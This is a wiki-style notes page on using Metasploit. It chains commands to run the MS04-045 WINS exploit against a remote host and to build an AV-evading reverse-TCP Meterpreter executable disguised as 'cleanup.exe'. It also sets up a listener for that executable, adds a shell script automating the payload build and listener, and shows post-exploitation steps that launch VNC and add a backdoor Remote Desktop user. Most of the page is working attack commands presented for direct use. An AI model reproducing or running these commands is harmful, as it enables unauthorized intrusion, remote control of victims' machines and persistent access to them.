Metasploit
From Whats notepad
The best interface is:
msfconsole
To see the advanced options of both payloads and exploits (the module name uses the old Metasploit 2.x naming on this page):
use wins_ms04_045
show advanced
Usage
Information about the exploit
info wins_ms04_045
Load it into our environment
use wins_ms04_045
Configure it (the remote target host)
set RHOST 192.168.0.1
Show the possible targets
show targets
Choose a target
set TARGET 2
Show the payloads this exploit can carry
show payloads
Look at the info for a payload
info win32_passivex
Choose the payload
set PAYLOAD win32_passivex
Review its options
show options
Verify that the options are correct and, if the module supports it, whether the machine is vulnerable (check does not exploit the target)
check
Run the exploit
exploit
Meterpreter
Generate an executable that opens a reverse Meterpreter session back to us (msfpayload and msfencode have since been removed from Metasploit; msfvenom combines both)
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.99 R | msfencode -e x86/shikata_ga_nai -c 6 -t exe > cleanup.exe
Wait for incoming Meterpreter sessions (LHOST must match the address embedded in the executable; 0.0.0.0 listens on every local interface)
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lhost 0.0.0.0
exploit
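The two steps above typed out by hand every time are error-prone (a LHOST typo means the executable calls back to the wrong address). The script below is an added example, not from the original page or from the Metasploit project: it renders the handler commands into an msfconsole resource script, validates the listener address first, and, if the tools are installed, builds the executable with msfvenom (the current replacement for the msfpayload | msfencode pipeline) and starts the listener non-interactively. The file name handler.rc, port 4444 and the CALLBACK variable are assumptions made for the example.

```shell
#!/bin/sh
# Added example (not code from the original page): non-interactive
# multi/handler setup. Assumed names: handler.rc, LPORT 4444, $CALLBACK.

# render_handler_rc PAYLOAD LHOST LPORT
# Print an msfconsole resource script. ExitOnSession false keeps the
# listener alive after the first session; -j backgrounds the job and
# -z avoids dropping into the first session automatically.
render_handler_rc() {
    printf 'use exploit/multi/handler\n'
    printf 'set PAYLOAD %s\n' "$1"
    printf 'set LHOST %s\n' "$2"
    printf 'set LPORT %s\n' "$3"
    printf 'set ExitOnSession false\n'
    printf 'exploit -j -z\n'
}

# validate_ipv4 ADDR: succeed only for a dotted quad with octets 0-255.
validate_ipv4() {
    old_ifs="$IFS"; IFS=.
    set -- $1
    IFS="$old_ifs"
    [ $# -eq 4 ] || return 1
    for o in "$@"; do
        case "$o" in ''|*[!0-9]*) return 1 ;; esac
        [ "$o" -le 255 ] || return 1
    done
    return 0
}

main() {
    payload="${PAYLOAD:-windows/meterpreter/reverse_tcp}"
    lhost="${LHOST:-0.0.0.0}"          # where the handler listens
    lport="${LPORT:-4444}"
    out="${OUT:-handler.rc}"           # assumed output file name
    validate_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
    render_handler_rc "$payload" "$lhost" "$lport" > "$out"
    echo "wrote $out"

    # CALLBACK is the address the victim must reach; it is embedded in
    # the executable and has to be routable from the target, unlike the
    # 0.0.0.0 wildcard that is fine for the listener side.
    if [ -n "${CALLBACK:-}" ] && command -v msfvenom >/dev/null 2>&1; then
        validate_ipv4 "$CALLBACK" || { echo "bad CALLBACK" >&2; return 1; }
        msfvenom -p "$payload" LHOST="$CALLBACK" LPORT="$lport" \
            -e x86/shikata_ga_nai -i 6 -f exe -o cleanup.exe
    fi

    if command -v msfconsole >/dev/null 2>&1; then
        msfconsole -q -r "$out"
    else
        echo "msfconsole not found; resource script left in $out" >&2
    fi
}

# Only run the flow when invoked as: sh handler.sh --run
if [ "${1:-}" = "--run" ]; then
    main
fi
```

Run it as `CALLBACK=192.168.1.99 sh handler.sh --run`; without msfconsole on the path it just leaves handler.rc behind, which can be loaded later with `msfconsole -r handler.rc` or `resource handler.rc` from inside the console.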
Launch a VNC server on the compromised host
meterpreter> run vnc
Enable Remote Desktop and add a user (note that this script creates an account and changes local group membership, so run the clean-up resource script it prints when you are done)
meterpreter> run getgui -u whats -p hehe -l en_EN
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Language detection started
[*] Language detected: en_US
[*] Setting user account for logon
[*] Adding User: whats with Password: hehe
[*] Adding User: whats to local group
[*] Adding User: whats to local group
[*] You can now login with the created user
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up__20110123.3855.rc
Links
Interesting Metasploit course
http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training
